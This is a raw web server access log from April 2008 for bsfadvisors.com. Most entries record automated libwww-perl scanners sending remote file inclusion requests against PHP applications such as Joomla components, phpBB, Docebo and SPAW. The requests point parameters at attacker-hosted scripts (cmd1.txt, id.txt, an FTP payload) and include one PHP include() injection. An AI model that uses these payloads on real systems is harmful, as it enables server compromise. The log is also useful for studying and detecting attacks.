204.11.51.137 - - [01/Apr/2008:05:19:16 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
204.11.51.137 - - [01/Apr/2008:05:19:16 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
87.106.31.158 - - [01/Apr/2008:05:19:19 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
87.106.31.158 - - [01/Apr/2008:05:19:20 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
211.220.195.20 - - [01/Apr/2008:05:20:41 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
211.220.195.20 - - [01/Apr/2008:05:20:42 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
211.220.195.20 - - [01/Apr/2008:05:20:42 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
216.40.45.130 - - [01/Apr/2008:05:21:18 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
216.40.45.130 - - [01/Apr/2008:05:21:18 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
216.40.45.130 - - [01/Apr/2008:05:21:18 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
89.108.66.169 - - [01/Apr/2008:05:22:02 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.geocities.com/vie.tian/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
87.106.31.158 - - [01/Apr/2008:05:23:46 -0700] "GET /logs/access.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
87.106.31.158 - - [01/Apr/2008:05:23:46 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
87.106.31.158 - - [01/Apr/2008:05:23:46 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
213.195.77.225 - - [01/Apr/2008:05:24:59 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
64.246.44.108 - - [01/Apr/2008:05:25:42 -0700] "GET /logs/access.log//config/dbutil.bck.php?confdir=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
64.246.44.108 - - [01/Apr/2008:05:25:42 -0700] "GET //config/dbutil.bck.php?confdir=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
64.246.44.108 - - [01/Apr/2008:05:25:43 -0700] "GET /logs//config/dbutil.bck.php?confdir=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
213.195.77.225 - - [01/Apr/2008:05:26:08 -0700] "GET //excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
89.108.66.169 - - [01/Apr/2008:05:26:08 -0700] "GET /logs//login.php?dir=http://www.geocities.com/vie.tian/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
89.108.66.169 - - [01/Apr/2008:05:26:08 -0700] "GET //login.php?dir=http://www.geocities.com/vie.tian/31377.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:05:26:28 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
68.149.224.227 - - [01/Apr/2008:05:27:16 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
68.149.224.227 - - [01/Apr/2008:05:27:16 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
217.67.26.84 - - [01/Apr/2008:05:27:48 -0700] "GET /logs/access_080101.log//hpmaker/index.php?p=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
217.67.26.84 - - [01/Apr/2008:05:27:48 -0700] "GET //hpmaker/index.php?p=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
217.67.26.84 - - [01/Apr/2008:05:27:52 -0700] "GET /logs//hpmaker/index.php?p=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
217.67.26.84 - - [01/Apr/2008:05:27:55 -0700] "GET /logs/access_071231.log//hpmaker/index.php?p=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
67.19.107.122 - - [01/Apr/2008:05:29:08 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
67.19.107.122 - - [01/Apr/2008:05:29:08 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
67.19.107.122 - - [01/Apr/2008:05:29:09 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
204.11.51.137 - - [01/Apr/2008:05:30:54 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
204.11.51.137 - - [01/Apr/2008:05:30:54 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
81.198.83.196 - - [01/Apr/2008:05:31:26 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.geocities.com/h4_dy/lek.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
67.100.12.226 - - [01/Apr/2008:05:33:08 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootP=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
67.100.12.226 - - [01/Apr/2008:05:33:08 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
67.100.12.226 - - [01/Apr/2008:05:33:08 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://ezsm.ru/media/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
67.195.44.110 - - [01/Apr/2008:05:34:31 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.bsfadvisors.com"
67.195.44.97 - - [01/Apr/2008:05:34:32 -0700] "GET /logs/access_080201.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.bsfadvisors.com"
87.106.31.158 - - [01/Apr/2008:05:36:58 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
87.106.31.158 - - [01/Apr/2008:05:36:58 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
222.122.47.228 - - [01/Apr/2008:05:37:44 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
222.122.47.228 - - [01/Apr/2008:05:37:44 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
222.122.47.228 - - [01/Apr/2008:05:37:45 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
89.108.64.152 - - [01/Apr/2008:05:38:33 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.redladys.net/tgp/alat/idscan3?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
88.151.103.27 - - [01/Apr/2008:05:39:17 -0700] "GET /logs/access_080101.log//hpmaker/index.php?p=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
88.151.103.27 - - [01/Apr/2008:05:39:17 -0700] "GET /logs/access_071231.log//hpmaker/index.php?p=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
216.118.81.182 - - [01/Apr/2008:05:40:39 -0700] "GET /logs/access_071231.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.geocities.com/bangke77/cmdrfi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.118.81.182 - - [01/Apr/2008:05:40:39 -0700] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://www.geocities.com/bangke77/cmdrfi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
216.118.81.182 - - [01/Apr/2008:05:40:39 -0700] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://www.geocities.com/bangke77/cmdrfi.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
208.79.239.236 - - [01/Apr/2008:05:41:12 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.bsfadvisors.com"
208.79.239.236 - - [01/Apr/2008:05:41:12 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.gooteo.com/adpics/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:05:42:47 -0700] "GET /logs/access.log//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:05:42:48 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.euricolopes.net/portal/includes/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.bsfadvisors.com"
72.29.65.97 - - [01/Apr/2008:05:43:36 -0700] "GET /logs/index.php3?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.65.97 - - [01/Apr/2008:05:43:36 -0700] "GET /index.php3?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.81.233 - - [01/Apr/2008:05:43:39 -0700] "GET /logs/index.php3?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.81.233 - - [01/Apr/2008:05:43:39 -0700] "GET /index.php3?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
222.122.47.228 - - [01/Apr/2008:05:46:25 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
222.122.47.228 - - [01/Apr/2008:05:46:26 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
222.122.47.228 - - [01/Apr/2008:05:46:27 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
69.93.48.162 - - [01/Apr/2008:05:46:42 -0700] "GET /logs/index.php3?act=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.bsfadvisors.com"
69.93.48.162 - - [01/Apr/2008:05:46:42 -0700] "GET /logs/index.php3?act=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.bsfadvisors.com"
69.93.48.162 - - [01/Apr/2008:05:46:42 -0700] "GET /index.php3?act=ftp://84.32.137.157/incoming/upload/trem/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.bsfadvisors.com"
69.93.48.162 - - [01/Apr/2008:05:46:42 -0700] "GET /index.php3?act=ftp://84.32.137.157/incoming/upload/trem/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.bsfadvisors.com"
211.220.195.20 - - [01/Apr/2008:05:47:39 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
211.220.195.20 - - [01/Apr/2008:05:47:40 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
222.122.47.228 - - [01/Apr/2008:05:48:35 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
222.122.47.228 - - [01/Apr/2008:05:48:36 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
222.122.47.228 - - [01/Apr/2008:05:48:36 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
87.106.65.116 - - [01/Apr/2008:05:48:43 -0700] "GET /logs/access_071231.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
87.106.65.116 - - [01/Apr/2008:05:48:44 -0700] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
87.106.65.116 - - [01/Apr/2008:05:48:44 -0700] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
218.234.21.89 - - [01/Apr/2008:05:49:53 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.234.21.89 - - [01/Apr/2008:05:49:54 -0700] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
218.234.21.89 - - [01/Apr/2008:05:49:54 -0700] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.tecnicsuport.com/dades/gestiobanners/special.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
72.29.81.233 - - [01/Apr/2008:05:50:38 -0700] "GET /logs/modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.81.233 - - [01/Apr/2008:05:50:39 -0700] "GET /modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.65.97 - - [01/Apr/2008:05:50:41 -0700] "GET /logs/modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.65.97 - - [01/Apr/2008:05:50:41 -0700] "GET /modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
66.225.219.10 - - [01/Apr/2008:05:51:24 -0700] "GET /logs/access.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
66.225.219.10 - - [01/Apr/2008:05:51:32 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.forja-artistica.com/portal/modules/Forums/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
64.246.44.108 - - [01/Apr/2008:05:52:06 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
64.246.44.108 - - [01/Apr/2008:05:52:07 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
64.246.44.108 - - [01/Apr/2008:05:52:12 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://h1.ripway.com/bhlcrew/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
72.29.75.39 - - [01/Apr/2008:05:52:14 -0700] "GET /logs/modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.75.39 - - [01/Apr/2008:05:52:15 -0700] "GET /modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.64.142 - - [01/Apr/2008:05:52:22 -0700] "GET /logs/modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
72.29.64.142 - - [01/Apr/2008:05:52:23 -0700] "GET /modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
222.122.47.228 - - [01/Apr/2008:05:54:05 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
222.122.47.228 - - [01/Apr/2008:05:54:05 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
222.122.47.228 - - [01/Apr/2008:05:54:06 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.geocities.com/nyon_nyos/cmd1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
87.106.65.116 - - [01/Apr/2008:05:54:31 -0700] "GET /logs/access_071231.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
87.106.65.116 - - [01/Apr/2008:05:54:31 -0700] "GET //language/lang_english/lang_main_album.php?phpbb_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
87.106.65.116 - - [01/Apr/2008:05:54:31 -0700] "GET /logs//language/lang_english/lang_main_album.php?phpbb_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
207.7.108.242 - - [01/Apr/2008:05:55:12 -0700] "GET /logs/modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
207.7.108.242 - - [01/Apr/2008:05:55:12 -0700] "GET /modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
68.149.224.227 - - [01/Apr/2008:05:55:51 -0700] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
68.149.224.227 - - [01/Apr/2008:05:55:51 -0700] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.vsm.gov.tr/pwnd/safe.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
87.94.1.95 - - [01/Apr/2008:05:57:00 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.cms-medien.org/include/inc_ext/rsswriter/cmd3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.bsfadvisors.com"
87.94.1.95 - - [01/Apr/2008:05:57:00 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.cms-medien.org/include/inc_ext/rsswriter/cmd3.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.bsfadvisors.com"
87.106.65.116 - - [01/Apr/2008:05:57:10 -0700] "GET /logs/access_071201.log//language/lang_english/lang_main_album.php?phpbb_root_path=http://64.185.237.35/~hostingv/1/2/3/4/5/6/7/8/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.bsfadvisors.com"
89.159.200.63 - - [01/Apr/2008:05:57:16 -0700] "GET /logs/access.log HTTP/1.1" 206 10 "-" "libwww-perl/5.805" "bsfadvisors.com"
89.159.200.63 - - [01/Apr/2008:05:57:34 -0700] "GET /logs/access.log HTTP/1.1" 206 10 "-" "libwww-perl/5.805" "bsfadvisors.com"
88.151.103.27 - - [01/Apr/2008:05:57:41 -0700] "GET /logs/modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
88.151.103.27 - - [01/Apr/2008:05:57:42 -0700] "GET /modulescjaycontentadmineditor2spaw_control.class.php?spaw_root=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.bsfadvisors.com"
212.85.12.121 - - [01/Apr/2008:05:57:58 -0700] "GET /logs//includes/functions_portal.php?phpbb_root_path=http://isnova.madeiratecnopolo.pt/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.bsfadvisors.com"
